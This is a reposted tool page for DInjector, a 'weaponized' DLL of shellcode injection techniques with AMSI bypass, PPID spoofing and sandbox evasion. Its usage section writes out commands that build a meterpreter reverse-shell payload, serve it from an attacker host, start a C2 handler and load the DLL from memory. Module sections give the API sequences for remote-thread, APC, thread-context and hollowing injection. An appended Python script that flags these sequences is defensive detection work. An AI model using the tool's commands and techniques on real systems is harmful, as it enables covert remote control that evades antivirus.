URL: https://www.kitploit.com/2021/12/dinjector-collection-of-shellcode.html
Submission: On December 11 via api from US — Scanned from DE


DINJECTOR - COLLECTION OF SHELLCODE INJECTION TECHNIQUES PACKED IN A D/INVOKE
WEAPONIZED DLL

Posted at 8:30 AM by Zion3R






This repository is an accumulation of my code snippets for various shellcode
injection techniques using the fantastic D/Invoke API by @TheWover and
@FuzzySecurity.

Features:

 * Fully ported to D/Invoke API
 * Encrypted payloads which can be invoked from a URL or passed in base64 as an
   argument
 * Built-in AMSI bypass
 * PPID spoofing and block non-Microsoft DLLs (stolen from TikiTorch, write-up
   is here)
 * Sandbox detection & evasion



Based on my testing, the DInvoke NuGet package itself is flagged by many
commercial AV/EDR solutions when included as an embedded resource via
Costura.Fody (or similar approaches), so I've shrunk it a bit and included it
from source to achieve better OpSec.








USAGE

 1. Compile the project in VS.
 2. Generate a shellcode for your favourite C2:

~$ msfvenom -p windows/x64/meterpreter/reverse_winhttps LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f raw -o shellcode.bin

 3. Encrypt the shellcode:

~$ encrypt.py shellcode.bin -p 'Passw0rd!' -o enc

 4. Serve the encrypted shellcode and prepare C2 listener:

~$ sudo python3 -m http.server 80
~$ sudo msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_winhttps; set lhost 10.10.13.37; set lport 443; set EXITFUNC thread; run"

 5. Use the PowerShell download cradle to load DInjector.dll as
    System.Reflection.Assembly and execute it from memory.



I do not recommend putting the assembly on disk because it will very likely be
flagged.

Required global arguments:

Name        Example Value            Description
/am51       True, False              Applies AMSI bypass
/sc         http://10.10.13.37/enc   Sets shellcode path (can be loaded from URL or as a Base64 string)
/password   Passw0rd!                Sets password to decrypt the shellcode


MODULES



OpSec-safe considerations are based on my personal usage experience and some
testing along the way.


FUNCTIONPOINTER

module_name: 'functionpointer'
description: |
  Allocates a RWX memory region, copies the shellcode into it
  and executes it like a function.
calls:
  - ntdll.dll:
    1: 'NtAllocateVirtualMemory (PAGE_READWRITE)'
    2: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
opsec_safe: false
references:
  - 'http://disbauxes.upc.es/code/two-basic-ways-to-run-and-test-shellcode/'
  - 'https://www.ired.team/offensive-security/code-injection-process-injection/local-shellcode-execution-without-windows-apis'
  - 'https://www.fergonez.net/post/shellcode-csharp'


FUNCTIONPOINTERV2

module_name: 'functionpointerv2'
description: |
  Sets RWX on a byte array and executes it like a function.
calls:
  - ntdll.dll:
    1: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
opsec_safe: false
references:
  - 'https://jhalon.github.io/utilizing-syscalls-in-csharp-1/'
  - 'https://jhalon.github.io/utilizing-syscalls-in-csharp-2/'
  - 'https://github.com/jhalon/SharpCall/blob/master/Syscalls.cs'


CURRENTTHREAD

module_name: 'currentthread'
description: |
  Injects shellcode into current process.
  Thread execution via NtCreateThreadEx.
calls:
  - ntdll.dll:
    1: 'NtAllocateVirtualMemory (PAGE_READWRITE)'
    2: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
    3: 'NtCreateThreadEx'
    4: 'NtWaitForSingleObject'
opsec_safe: false
references:
  - 'https://github.com/XingYun-Cloud/D-Invoke-syscall/blob/main/Program.cs'


REMOTETHREAD

module_name: 'remotethread'
arguments: |
  /pid:1337
description: |
  Injects shellcode into an existing remote process.
  Thread execution via NtCreateThreadEx.
calls:
  - ntdll.dll:
    1: 'NtOpenProcess'
    2: 'NtAllocateVirtualMemory (PAGE_READWRITE)'
    3: 'NtWriteVirtualMemory'
    4: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
    5: 'NtCreateThreadEx'
opsec_safe: false
references:
  - 'https://github.com/S3cur3Th1sSh1t/SharpImpersonation/blob/main/SharpImpersonation/Shellcode.cs'


REMOTETHREADSUSPENDED

module_name: 'remotethreadsuspended'
arguments: |
  /pid:1337
description: |
  Injects shellcode into an existing remote process and flips memory protection to PAGE_NOACCESS.
  After a short sleep (waiting until a possible AV scan is finished) the protection is flipped again to PAGE_EXECUTE_READ.
  Thread execution via NtCreateThreadEx.
calls:
  - ntdll.dll:
    1: 'NtOpenProcess'
    2: 'NtAllocateVirtualMemory (PAGE_READWRITE)'
    3: 'NtWriteVirtualMemory'
    4: 'NtProtectVirtualMemory (PAGE_NOACCESS)'
    5: 'NtCreateThreadEx (CREATE_SUSPENDED)'
    6: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
    7: 'NtResumeThread'
opsec_safe: true
references:
  - 'https://labs.f-secure.com/blog/bypassing-windows-defender-runtime-scanning/'
  - 'https://github.com/plackyhacker/Suspended-Thread-Injection/blob/main/injection.cs'


REMOTETHREADAPC

module_name: 'remotethreadapc'
arguments: |
  /image:C:\Windows\System32\svchost.exe /ppid:31337 /blockDlls:True
description: |
  Injects shellcode into a newly spawned remote process.
  Thread execution via NtQueueApcThread.
calls:
  - kernel32.dll:
    1: 'InitializeProcThreadAttributeList'
    2: 'UpdateProcThreadAttribute (blockDLLs)'
    3: 'UpdateProcThreadAttribute (PPID)'
    4: 'CreateProcessA'
  - ntdll.dll:
    1: 'NtAllocateVirtualMemory (PAGE_READWRITE)'
    2: 'NtWriteVirtualMemory'
    3: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
    4: 'NtOpenThread'
    5: 'NtQueueApcThread'
    6: 'NtAlertResumeThread'
opsec_safe: true
references:
  - 'https://rastamouse.me/exploring-process-injection-opsec-part-2/'
  - 'https://gist.github.com/jfmaes/944991c40fb34625cf72fd33df1682c0'


REMOTETHREADCONTEXT

module_name: 'remotethreadcontext'
arguments: |
  /image:C:\Windows\System32\svchost.exe /ppid:31337 /blockDlls:True
description: |
  Injects shellcode into a newly spawned remote process.
  Thread execution via SetThreadContext.
calls:
  - kernel32.dll:
    1: 'InitializeProcThreadAttributeList'
    2: 'UpdateProcThreadAttribute (blockDLLs)'
    3: 'UpdateProcThreadAttribute (PPID)'
    4: 'CreateProcessA'
  - ntdll.dll:
    1: 'NtAllocateVirtualMemory (PAGE_READWRITE)'
    2: 'NtWriteVirtualMemory'
    3: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
    4: 'NtCreateThreadEx (CREATE_SUSPENDED)'
    5: 'GetThreadContext'
    6: 'SetThreadContext'
    7: 'NtResumeThread'
opsec_safe: true
references:
  - 'https://blog.xpnsec.com/undersanding-and-evading-get-injectedthread/'
  - 'https://github.com/djhohnstein/CSharpSetThreadContext/blob/master/Runner/Program.cs'


PROCESSHOLLOW

module_name: 'processhollow'
arguments: |
  /image:C:\Windows\System32\svchost.exe /ppid:31337 /blockDlls:True
description: |
  Injects shellcode into a newly spawned remote process.
  Thread execution via NtResumeThread (hollowing with shellcode).
calls:
  - kernel32.dll:
    1: 'InitializeProcThreadAttributeList'
    2: 'UpdateProcThreadAttribute (blockDLLs)'
    3: 'UpdateProcThreadAttribute (PPID)'
    4: 'CreateProcessA'
  - ntdll.dll:
    1: 'NtQueryInformationProcess'
    2: 'NtReadVirtualMemory'
    3: 'NtProtectVirtualMemory (PAGE_EXECUTE_READWRITE)'
    4: 'NtWriteVirtualMemory'
    5: 'NtProtectVirtualMemory (oldProtect)'
    6: 'NtResumeThread'
opsec_safe: false
references:
  - 'https://github.com/CCob/SharpBlock/blob/master/Program.cs'
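
The call lists above are exactly what a host sensor with user-mode API telemetry can key on. The following Python script is an added example, not part of DInjector or any of the referenced projects: it replays a constructed API-event trace (hypothetical pids, region tags and event shape) through a small state machine that tracks each memory region's protection history and flags the sequences the modules describe: a region written to and then made executable, the PAGE_NOACCESS to PAGE_EXECUTE_READ flip used by remotethreadsuspended, a remote write into an already-executable region (the processhollow pattern), a thread start, APC or resume aimed at a written executable region, and a CreateProcessA issued after a PPID attribute was set.

```python
"""Detection logic for the API-call sequences listed in the DInjector module
descriptions. Added example, not DInjector project code: it replays a
constructed event trace (the shape a user-mode API sensor might emit) and
flags write-then-execute patterns, the PAGE_NOACCESS -> PAGE_EXECUTE_READ
flip, remote writes into executable memory, and children spawned after a
PPID attribute was set."""
from dataclasses import dataclass, field

EXEC_PROTS = {"PAGE_EXECUTE", "PAGE_EXECUTE_READ", "PAGE_EXECUTE_READWRITE"}
EXEC_TRIGGERS = {"NtCreateThreadEx", "NtQueueApcThread", "SetThreadContext", "NtResumeThread"}

# Constructed sample trace with hypothetical pids and region tags:
# (source_pid, api, target_pid, region_tag, detail)
SAMPLE_TRACE = [
    # local RW -> write -> RX -> thread (currentthread-style; also what a JIT looks like)
    (100, "NtAllocateVirtualMemory", 100, "A", "PAGE_READWRITE"),
    (100, "NtWriteVirtualMemory",    100, "A", ""),
    (100, "NtProtectVirtualMemory",  100, "A", "PAGE_EXECUTE_READ"),
    (100, "NtCreateThreadEx",        100, "A", ""),
    # remotethreadsuspended-style: RW -> write -> NOACCESS -> suspended thread -> RX -> resume
    (200, "NtOpenProcess",           300, "",  ""),
    (200, "NtAllocateVirtualMemory", 300, "B", "PAGE_READWRITE"),
    (200, "NtWriteVirtualMemory",    300, "B", ""),
    (200, "NtProtectVirtualMemory",  300, "B", "PAGE_NOACCESS"),
    (200, "NtCreateThreadEx",        300, "B", "CREATE_SUSPENDED"),
    (200, "NtProtectVirtualMemory",  300, "B", "PAGE_EXECUTE_READ"),
    (200, "NtResumeThread",          300, "B", ""),
    # remotethreadapc-style: PPID attribute, spawn, RW -> write -> RX -> APC
    (400, "UpdateProcThreadAttribute", 400, "", "PPID"),
    (400, "CreateProcessA",          500, "",  "CREATE_SUSPENDED"),
    (400, "NtAllocateVirtualMemory", 500, "C", "PAGE_READWRITE"),
    (400, "NtWriteVirtualMemory",    500, "C", ""),
    (400, "NtProtectVirtualMemory",  500, "C", "PAGE_EXECUTE_READ"),
    (400, "NtQueueApcThread",        500, "C", ""),
    # processhollow-style: image region made RWX, overwritten, protection restored, resumed
    (600, "CreateProcessA",          700, "",  "CREATE_SUSPENDED"),
    (600, "NtProtectVirtualMemory",  700, "IMG", "PAGE_EXECUTE_READWRITE"),
    (600, "NtWriteVirtualMemory",    700, "IMG", ""),
    (600, "NtProtectVirtualMemory",  700, "IMG", "PAGE_EXECUTE_READ"),
    (600, "NtResumeThread",          700, "IMG", ""),
]


@dataclass
class Region:
    owner_pid: int            # process that allocated or first touched the region
    target_pid: int           # process whose address space holds the region
    written: bool = False
    prots: list = field(default_factory=list)  # protection history, oldest first

    @property
    def current_prot(self):
        return self.prots[-1] if self.prots else None


@dataclass(frozen=True)
class Finding:
    source_pid: int
    target_pid: int
    region: str
    rule: str
    severity: str


def analyze(trace):
    """Return the findings for a trace, in the order they were triggered."""
    regions, ppid_attr, findings = {}, set(), []
    for src, api, tgt, reg, detail in trace:
        key, remote = (tgt, reg), src != tgt
        if api == "UpdateProcThreadAttribute" and detail == "PPID":
            ppid_attr.add(src)
        elif api == "CreateProcessA" and src in ppid_attr:
            findings.append(Finding(src, tgt, "", "child_spawned_with_spoofed_parent", "medium"))
        elif api == "NtAllocateVirtualMemory":
            regions[key] = Region(src, tgt, prots=[detail])
        elif api == "NtWriteVirtualMemory" and key in regions:
            r = regions[key]
            if remote and r.current_prot in EXEC_PROTS:   # hollowing-style overwrite
                findings.append(Finding(src, tgt, reg, "remote_write_into_executable_region", "high"))
            r.written = True
        elif api == "NtProtectVirtualMemory":
            r = regions.setdefault(key, Region(src, tgt))  # image regions are never "allocated"
            prev = r.current_prot
            r.prots.append(detail)
            if detail in EXEC_PROTS and prev not in EXEC_PROTS and r.written:
                if prev == "PAGE_NOACCESS":
                    findings.append(Finding(src, tgt, reg, "noaccess_to_exec_flip", "high"))
                else:
                    findings.append(Finding(src, tgt, reg, "written_then_executable",
                                            "high" if remote else "low"))
        elif api in EXEC_TRIGGERS and key in regions:
            r = regions[key]
            if r.written and r.current_prot in EXEC_PROTS:
                findings.append(Finding(src, tgt, reg, f"exec_in_written_region_via_{api}",
                                        "high" if remote else "medium"))
    return findings


def count_by_severity(findings):
    counts = {"low": 0, "medium": 0, "high": 0}
    for f in findings:
        counts[f.severity] += 1
    return counts


if __name__ == "__main__":
    hits = analyze(SAMPLE_TRACE)
    for f in hits:
        print(f"[{f.severity:6}] {f.rule:48} src={f.source_pid} tgt={f.target_pid} region={f.region!r}")
    print(count_by_severity(hits))
```

A local RW to RX transition on its own is reported as low severity because managed runtimes' JITs produce it routinely; every high-severity rule requires either a cross-process write or the NOACCESS flip. That is why remotethreadsuspended is the loudest module in this trace even though the tool marks it opsec_safe: the flag reflects the author's AV memory-scan testing, while the call sequence itself is still fully visible in API telemetry.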


CREDITS

 * @TheWover and @FuzzySecurity for their awesome DInvoke project.
 * All those great researchers mentioned in the module references above.



Download DInjector
Copyright © 2021 KitPloit - PenTest & Hacking Tools
